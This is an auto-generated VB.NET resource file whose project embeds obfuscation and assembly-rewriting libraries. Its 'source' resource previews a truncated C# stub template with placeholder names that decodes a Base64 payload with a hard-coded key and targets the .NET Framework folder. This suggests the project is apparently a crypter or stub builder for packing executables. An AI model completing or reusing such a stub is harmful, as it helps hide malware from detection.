Files
2026-08-27 11:04:21 -06:00

207 lines
8.5 KiB
VB.net

'------------------------------------------------------------------------------
' <auto-generated>
' Il codice è stato generato da uno strumento.
' Versione runtime:4.0.30319.1
'
' Le modifiche apportate a questo file possono provocare un comportamento non corretto e andranno perse se
' il codice viene rigenerato.
' </auto-generated>
'------------------------------------------------------------------------------
Option Strict On
Option Explicit On
Imports System
Namespace My.Resources
'Questa classe è stata generata automaticamente dalla classe StronglyTypedResourceBuilder.
'tramite uno strumento quale ResGen o Visual Studio.
'Per aggiungere o rimuovere un membro, modificare il file con estensione ResX ed eseguire nuovamente ResGen
'con l'opzione /str oppure ricompilare il progetto VS.
'''<summary>
''' Classe di risorse fortemente tipizzata per la ricerca di stringhe localizzate e così via.
'''</summary>
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0"), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
Friend Module Resources
Private resourceMan As Global.System.Resources.ResourceManager
Private resourceCulture As Global.System.Globalization.CultureInfo
'''<summary>
''' Restituisce l'istanza di ResourceManager nella cache utilizzata da questa classe.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
Get
If Object.ReferenceEquals(resourceMan, Nothing) Then
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("WindowsApplication1.Resources", GetType(Resources).Assembly)
resourceMan = temp
End If
Return resourceMan
End Get
End Property
'''<summary>
''' Esegue l'override della proprietà CurrentUICulture del thread corrente per tutte le
''' ricerche di risorse eseguite utilizzando questa classe di risorse fortemente tipizzata.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend Property Culture() As Global.System.Globalization.CultureInfo
Get
Return resourceCulture
End Get
Set
resourceCulture = value
End Set
End Property
Friend ReadOnly Property AG_Configuration_SettingsProviders() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("AG_Configuration_SettingsProviders", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property AG_Deployment_Updating() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("AG_Deployment_Updating", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property AG_Eazfuscator_NET_Installer() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("AG_Eazfuscator_NET_Installer", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property AG_Eazfuscator_NET_Settings() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("AG_Eazfuscator_NET_Settings", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property AG_Eazfuscator_NET_Updating() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("AG_Eazfuscator_NET_Updating", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Castle_Core() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Castle_Core", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Castle_MicroKernel() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Castle_MicroKernel", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Eazfuscator_NET() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Eazfuscator_NET", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property ICSharpCode_SharpZipLib() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("ICSharpCode_SharpZipLib", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Microsoft_Cci_MetadataHelper() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Microsoft_Cci_MetadataHelper", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Microsoft_Cci_MetadataModel() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Microsoft_Cci_MetadataModel", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Microsoft_Cci_MutableMetadataModel() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Microsoft_Cci_MutableMetadataModel", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Microsoft_Cci_PeReader() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Microsoft_Cci_PeReader", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Microsoft_Cci_PeWriter() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Microsoft_Cci_PeWriter", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Microsoft_Cci_SourceModel() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Microsoft_Cci_SourceModel", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
Friend ReadOnly Property Mono_Cecil() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("Mono_Cecil", resourceCulture)
Return CType(obj,Byte())
End Get
End Property
'''<summary>
''' Cerca una stringa localizzata simile a
'''using System;
'''using System.Collections;
'''using System.Collections.Generic;
'''using Microsoft.Win32;
'''using System.Diagnostics;
'''using System.Runtime.InteropServices;
'''using System.IO;
'''using System.Text;
'''using System.Windows.Forms;
'''
'''namespace zazzo
'''{
'''static class adwadw
'''{
'''
''' public static void Main()
''' {
'''
'''
''' string %10% = &quot;msgoff&quot;;
''' byte[] %4% = %01%(Convert.FromBase64String(%3%), &quot;lolil&quot;);
''' string %64% = Environment.GetEnvironmentVariable(&quot;windir&quot;) + @&quot;\Microsoft.Net\Framewor [stringa troncata]&quot;;.
'''</summary>
Friend ReadOnly Property source() As String
Get
Return ResourceManager.GetString("source", resourceCulture)
End Get
End Property
End Module
End Namespace